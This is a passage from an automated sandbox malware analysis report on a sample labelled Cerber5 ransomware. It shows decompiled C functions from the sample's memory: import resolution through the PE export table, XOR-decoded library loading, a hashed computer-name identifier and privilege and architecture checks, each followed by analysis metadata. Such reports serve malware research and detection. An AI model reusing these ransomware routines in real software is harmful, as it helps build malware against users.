                                                                                                                                                                                        0x0040352f
                                                                                                                                                                                        0x00403532
                                                                                                                                                                                        0x00403534
                                                                                                                                                                                        0x00403536
                                                                                                                                                                                        0x00403537
                                                                                                                                                                                        0x0040353a
                                                                                                                                                                                        0x0040353d
                                                                                                                                                                                        0x0040353f
                                                                                                                                                                                        0x00403542
                                                                                                                                                                                        0x0040354b
                                                                                                                                                                                        0x0040354e
                                                                                                                                                                                        0x00403551
                                                                                                                                                                                        0x00403554
                                                                                                                                                                                        0x0040355c
                                                                                                                                                                                        0x00403556
                                                                                                                                                                                        0x00403556
                                                                                                                                                                                        0x00403556
                                                                                                                                                                                        0x0040355d
                                                                                                                                                                                        0x0040355f
                                                                                                                                                                                        0x0040355f
                                                                                                                                                                                        0x0040355f
                                                                                                                                                                                        0x00403544
                                                                                                                                                                                        0x00403544
                                                                                                                                                                                        0x00403545
                                                                                                                                                                                        0x00403548
                                                                                                                                                                                        0x00403548
                                                                                                                                                                                        0x00403563
                                                                                                                                                                                        0x00403563
                                                                                                                                                                                        0x00403565
                                                                                                                                                                                        0x00403568
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00403568
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00403523
                                                                                                                                                                                        0x0040350d
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040350d

                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 5e465166b07509489fe7f3d8f6ed24c9aee09f8265a77ea133756a180c1d7128
                                                                                                                                                                                        • Instruction ID: 3d60bcc9a551e5941e8321dfcb901b198a737b75647c57ae2da6220dae092667
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e465166b07509489fe7f3d8f6ed24c9aee09f8265a77ea133756a180c1d7128
                                                                                                                                                                                        • Instruction Fuzzy Hash: 937102B1D04246ABEB259FA8884577EBFA8EB41312F24447BC442B73C2D67C8F418B59
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 015704C5
                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 015705A1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.410711762.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_1540000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                        • Opcode ID: f0fc7789056491e0bcd13214261481ad261569ee2317a91b5abc443da0f3d989
                                                                                                                                                                                        • Instruction ID: a96aa12e1e2d59528ba4bb31f3a8335dc4d4be0aa76ba9b2c65531827691bb67
                                                                                                                                                                                        • Opcode Fuzzy Hash: f0fc7789056491e0bcd13214261481ad261569ee2317a91b5abc443da0f3d989
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F91AC75A00109DFDB48CF98D591EAEB7F5BF88314F208159E919AB381D735EE82CB90
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E004050BF(intOrPtr* _a4, signed short _a8, signed int _a12, signed int _a16) {
                                                                                                                                                                                        				char _v132;
                                                                                                                                                                                        				intOrPtr* _v136;
                                                                                                                                                                                        				signed short _v140;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                                        				struct HINSTANCE__* _t53;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        				signed int _t60;
                                                                                                                                                                                        				void* _t64;
                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                        				signed short _t69;
                                                                                                                                                                                        				intOrPtr* _t81;
                                                                                                                                                                                        				signed int _t85;
                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t81 = _a4;
                                                                                                                                                                                        				if(_t81 != 0) {
                                                                                                                                                                                        					_t64 = 0;
                                                                                                                                                                                        					__eflags =  *_t81 - 0x5a4d;
                                                                                                                                                                                        					if( *_t81 != 0x5a4d) {
                                                                                                                                                                                        						L20:
                                                                                                                                                                                        						_t38 = _t64;
                                                                                                                                                                                        						L21:
                                                                                                                                                                                        						return _t38;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t40 =  *((intOrPtr*)(_t81 + 0x3c)) + _t81 + 4;
                                                                                                                                                                                        					_v136 = _t40;
                                                                                                                                                                                        					__eflags =  *_t40 - 0x14c;
                                                                                                                                                                                        					if( *_t40 != 0x14c) {
                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t85 =  *(_t40 + 0x74);
                                                                                                                                                                                        					__eflags = _t85;
                                                                                                                                                                                        					if(_t85 == 0) {
                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t69 = _a8;
                                                                                                                                                                                        					_t86 = _t85 + _t81;
                                                                                                                                                                                        					__eflags = _t69 >> 0x10;
                                                                                                                                                                                        					if(_t69 >> 0x10 != 0) {
                                                                                                                                                                                        						__eflags = _a12 & 0x00000001;
                                                                                                                                                                                        						if((_a12 & 0x00000001) == 0) {
                                                                                                                                                                                        							_v140 = E00404EF9(_t69, E0040507C(_t69));
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_v140 = _t69;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t66 = 0;
                                                                                                                                                                                        						__eflags =  *(_t86 + 0x18);
                                                                                                                                                                                        						if( *(_t86 + 0x18) <= 0) {
                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                        								_t57 = E00404EF9( *((intOrPtr*)(_t81 + _t66 * 4 +  *((intOrPtr*)(_t86 + 0x20)))) + _t81, E0040507C( *((intOrPtr*)(_t81 + _t66 * 4 +  *((intOrPtr*)(_t86 + 0x20)))) + _t81));
                                                                                                                                                                                        								__eflags = _v140 - _t57;
                                                                                                                                                                                        								if(_v140 == _t57) {
                                                                                                                                                                                        									break;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t66 = _t66 + 1;
                                                                                                                                                                                        								__eflags = _t66 -  *(_t86 + 0x18);
                                                                                                                                                                                        								if(_t66 <  *(_t86 + 0x18)) {
                                                                                                                                                                                        									continue;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t60 =  *( *((intOrPtr*)(_t86 + 0x24)) + _t66 * 2 + _t81) & 0x0000ffff;
                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t60 = (_t69 & 0x0000ffff) -  *((intOrPtr*)(_t86 + 0x10));
                                                                                                                                                                                        						L23:
                                                                                                                                                                                        						__eflags = _t60 - 0xffffffff;
                                                                                                                                                                                        						if(_t60 == 0xffffffff) {
                                                                                                                                                                                        							L13:
                                                                                                                                                                                        							_t64 = 0;
                                                                                                                                                                                        							__eflags = 0;
                                                                                                                                                                                        							L14:
                                                                                                                                                                                        							__eflags = _t64 - _t86;
                                                                                                                                                                                        							if(_t64 < _t86) {
                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t45 = _v136;
                                                                                                                                                                                        							__eflags = _t64 -  *((intOrPtr*)(_t45 + 0x78)) + _t86;
                                                                                                                                                                                        							if(_t64 >=  *((intOrPtr*)(_t45 + 0x78)) + _t86) {
                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							__eflags = _a16;
                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                        								goto L1;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							E0040508C(_t64, __eflags,  &_v132);
                                                                                                                                                                                        							_t64 = 0;
                                                                                                                                                                                        							_t87 = E004050A5( &_v132);
                                                                                                                                                                                        							__eflags = _t87;
                                                                                                                                                                                        							if(_t87 != 0) {
                                                                                                                                                                                        								 *_t87 = 0; // executed
                                                                                                                                                                                        								_t53 = LoadLibraryExA( &_v132, 0, 0);
                                                                                                                                                                                        								__eflags = _t53;
                                                                                                                                                                                        								if(_t53 != 0) {
                                                                                                                                                                                        									__eflags = _t87 + 1;
                                                                                                                                                                                        									_t64 = E004050BF(_t53, _t87 + 1, 0, _a16);
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x1c)) + _t60 * 4 + _t81)) + _t81;
                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				L1:
                                                                                                                                                                                        				_t38 = 0;
                                                                                                                                                                                        				goto L21;
                                                                                                                                                                                        			}



















                                                                                                                                                                                        0x004051e6
                                                                                                                                                                                        0x00405174
                                                                                                                                                                                        0x00405174
                                                                                                                                                                                        0x00405174
                                                                                                                                                                                        0x00405176
                                                                                                                                                                                        0x00405176
                                                                                                                                                                                        0x00405178
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040517a
                                                                                                                                                                                        0x00405183
                                                                                                                                                                                        0x00405185
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00405187
                                                                                                                                                                                        0x0040518b
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00405198
                                                                                                                                                                                        0x004051a2
                                                                                                                                                                                        0x004051a9
                                                                                                                                                                                        0x004051ab
                                                                                                                                                                                        0x004051ad
                                                                                                                                                                                        0x004051b6
                                                                                                                                                                                        0x004051b8
                                                                                                                                                                                        0x004051bb
                                                                                                                                                                                        0x004051bd
                                                                                                                                                                                        0x004051c2
                                                                                                                                                                                        0x004051ce
                                                                                                                                                                                        0x004051ce
                                                                                                                                                                                        0x004051bd
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x004051ad
                                                                                                                                                                                        0x004051f1
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x004051f1
                                                                                                                                                                                        0x0040511d
                                                                                                                                                                                        0x004050d5
                                                                                                                                                                                        0x004050d5
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 004051B8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                                        • Opcode ID: 4800137a6d0576019bf18e3e223d368e835cbaabb2d3a25ea0341b9291db0bb8
                                                                                                                                                                                        • Instruction ID: c6742ce8dd1339212489777c70171deb5d259b5c48844efc6f8ab68823c637eb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4800137a6d0576019bf18e3e223d368e835cbaabb2d3a25ea0341b9291db0bb8
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5831D471A00A058FC724DE28C8C0A6B73E4FB44314F10063EE855AB2D2EB78DD44CBA9
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 01570258
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.410711762.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_1540000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                                        • Opcode ID: a2c2d76fb87602c03bfdf45c71e65d7c2dc1016122473ecb74e563991d5f964e
                                                                                                                                                                                        • Instruction ID: 00f83e7a15857813c4ba0a6db3bd33822a73f6d1fc37a61c6372f6d1559e12bd
                                                                                                                                                                                        • Opcode Fuzzy Hash: a2c2d76fb87602c03bfdf45c71e65d7c2dc1016122473ecb74e563991d5f964e
                                                                                                                                                                                        • Instruction Fuzzy Hash: EB31B975A00209DFCB08CF98C881AADB7F1FF8C314F108699E919AB395D734AA41CF90
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 31%
                                                                                                                                                                                        			E00402E39(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				signed char _v13;
                                                                                                                                                                                        				signed char _v14;
                                                                                                                                                                                        				signed char _v15;
                                                                                                                                                                                        				signed char _v16;
                                                                                                                                                                                        				signed char _v17;
                                                                                                                                                                                        				signed char _v18;
                                                                                                                                                                                        				signed char _v19;
                                                                                                                                                                                        				signed char _v20;
                                                                                                                                                                                        				signed short _v22;
                                                                                                                                                                                        				signed short _v24;
                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t42 = __ecx;
                                                                                                                                                                                        				_t41 = __ebx;
                                                                                                                                                                                        				_v8 = 0x10;
                                                                                                                                                                                        				_t23 = GetComputerNameA( &_v44,  &_v8);
                                                                                                                                                                                        				_t54 = _t23;
                                                                                                                                                                                        				if(_t23 != 0) {
                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                        					_push( &_v44);
                                                                                                                                                                                        					_push(E00405905(0x40ced4, 5, 0x7f642c43));
                                                                                                                                                                                        					_push( &_v12);
                                                                                                                                                                                        					_t23 = E00405B59(__ebx, _t42, __edi, __esi, _t54);
                                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                                        						_push(__esi);
                                                                                                                                                                                        						_t46 = _v12;
                                                                                                                                                                                        						_t27 = E0040AD86( &_v28, _v12, _t23,  &_v28); // executed
                                                                                                                                                                                        						_t56 = _t27;
                                                                                                                                                                                        						if(_t27 != 0) {
                                                                                                                                                                                        							_push(_v13 & 0x000000ff);
                                                                                                                                                                                        							_push(_v14 & 0x000000ff);
                                                                                                                                                                                        							_push(_v15 & 0x000000ff);
                                                                                                                                                                                        							_push(_v16 & 0x000000ff);
                                                                                                                                                                                        							_push(_v17 & 0x000000ff);
                                                                                                                                                                                        							_push(_v18 & 0x000000ff);
                                                                                                                                                                                        							_push(_v19 & 0x000000ff);
                                                                                                                                                                                        							_push(_v20 & 0x000000ff);
                                                                                                                                                                                        							_push(_v22 & 0x0000ffff);
                                                                                                                                                                                        							_push(_v24 & 0x0000ffff);
                                                                                                                                                                                        							_push(_v28);
                                                                                                                                                                                        							_push(E0040591C(0x40d228, 0x3c, 0x1f9ba433));
                                                                                                                                                                                        							_push(_a8);
                                                                                                                                                                                        							E00405A8E(_t41, __edi, _t46, _t56);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						return E00405463(_t46);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t23;
                                                                                                                                                                                        			}






















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetComputerNameA.KERNEL32(?,00000000), ref: 00402E4E
                                                                                                                                                                                          • Part of subcall function 0040AD86: CryptCreateHash.ADVAPI32(00008003,00000000,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADAB
                                                                                                                                                                                          • Part of subcall function 0040AD86: CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADBF
                                                                                                                                                                                          • Part of subcall function 0040AD86: CryptGetHashParam.ADVAPI32(00000000,00000002,00402F19,?,00000000,?,?,?,?,00402E97,00402F19,00000000), ref: 0040ADDD
                                                                                                                                                                                          • Part of subcall function 0040AD86: CryptDestroyHash.ADVAPI32(00000000,?,?,?,?,00402E97,00402F19,00000000,?,00000000), ref: 0040ADEB
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CryptHash$ComputerCreateDataDestroyNameParam
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1269158035-0
                                                                                                                                                                                        • Opcode ID: b519f69bbded85a786daec2fbcfd748c4088cd11490853b39124be7fa2958df4
                                                                                                                                                                                        • Instruction ID: b50cf408ba8baf7f798fd3c54e054df88dd5bb54a10a58e4a69460bee7ee399a
                                                                                                                                                                                        • Opcode Fuzzy Hash: b519f69bbded85a786daec2fbcfd748c4088cd11490853b39124be7fa2958df4
                                                                                                                                                                                        • Instruction Fuzzy Hash: BE110DA6C00159BDDF51A7D58D05EFFBBBC9E09205F0800A6FA90F11C2E67C9744ABB5
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E0040AC91(intOrPtr* __edi) {
                                                                                                                                                                                        				void* _v5;
                                                                                                                                                                                        				struct HINSTANCE__* _v12;
                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        				struct HINSTANCE__* _t19;
                                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                        				signed char _t27;
                                                                                                                                                                                        				signed char _t28;
                                                                                                                                                                                        				signed char* _t29;
                                                                                                                                                                                        				intOrPtr* _t32;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t29 = __edi;
                                                                                                                                                                                        				_t28 =  *((intOrPtr*)(__edi));
                                                                                                                                                                                        				_t35 = _t34 - 0x110;
                                                                                                                                                                                        				_t24 = 0;
                                                                                                                                                                                        				_t17 = 0;
                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                        					_t27 =  *(_t29 + _t17 + 1) ^ _t28;
                                                                                                                                                                                        					 *(_t33 + _t17 - 0x110) = _t27;
                                                                                                                                                                                        					if(_t27 == 0) {
                                                                                                                                                                                        						break;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                        					if(_t17 < 0x104) {
                                                                                                                                                                                        						continue;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					break;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v5 = _t24;
                                                                                                                                                                                        				_t19 = LoadLibraryExA( &_v276, _t24, _t24); // executed
                                                                                                                                                                                        				_v12 = _t19;
                                                                                                                                                                                        				if(_t19 != _t24) {
                                                                                                                                                                                        					_v5 = 1;
                                                                                                                                                                                        					if( *((intOrPtr*)(_t29 + 0x108)) > _t24) {
                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                        							_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x10c)) + _t24 * 4));
                                                                                                                                                                                        							_t22 = E004050BF(_v12,  *_t32, 1,  *0x40edd0); // executed
                                                                                                                                                                                        							_t35 = _t35 + 0x10;
                                                                                                                                                                                        							 *_t32 = _t22;
                                                                                                                                                                                        							if(_t22 == 0) {
                                                                                                                                                                                        								break;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t24 = _t24 + 1;
                                                                                                                                                                                        							if(_t24 <  *((intOrPtr*)(_t29 + 0x108))) {
                                                                                                                                                                                        								continue;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v5 = 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				L9:
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}


















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 0040ACC5
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                        			E004061F0(void _a4, intOrPtr _a8) {
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(8);
                                                                                                                                                                                        				_t14 = E004053BD(_t11);
                                                                                                                                                                                        				 *((intOrPtr*)(_t14 + 4)) = _a8;
                                                                                                                                                                                        				 *_t14 = _a4; // executed
                                                                                                                                                                                        				_t7 = CreateThread(0, 0, E004061AD, _t14, 0, 0); // executed
                                                                                                                                                                                        				_t10 = _t7;
                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                        					E00405463(_t14);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t10;
                                                                                                                                                                                        			}









                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,004061AD,00000000,00000000,00000000), ref: 00406216
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$CreateFreeHeapThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4263259073-0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E00402DB2(void* __ecx, void* _a4) {
                                                                                                                                                                                        				void _v8;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				int _t9;
                                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t12 = 0; // executed
                                                                                                                                                                                        				_t9 = GetTokenInformation(_a4, 0x14,  &_v8, 4,  &_v12); // executed
                                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                                        					_t12 = 0 | _v8 != 0x00000000;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t12;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,00000000,?,?,?,00402E1D,?,?,?,?,0040811E,00000000), ref: 00402DC9
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InformationToken
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 4114910276-0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                        			E00405FC4() {
                                                                                                                                                                                        				void _v36;
                                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v40 = _v40 & 0x00000000;
                                                                                                                                                                                        				_t15 = 8;
                                                                                                                                                                                        				memset( &_v36, 0, _t15 << 2);
                                                                                                                                                                                        				 *0x40f290( &_v40); // executed
                                                                                                                                                                                        				return 0 | _v40 == 0x00000009;
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32(00000000,?), ref: 00405FDD
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1721193555-0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E004066BB(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                                                                                        
                                                                                                                                                                                        				if(_a8 == 0x110) {
                                                                                                                                                                                        					 *( *(_a16 + 0x40)) = E0040AD18() & 0x000000ff; // executed
                                                                                                                                                                                        					PostMessageW(_a4, 0x111, 2, 0); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}




                                                                                                                                                                                        APIs
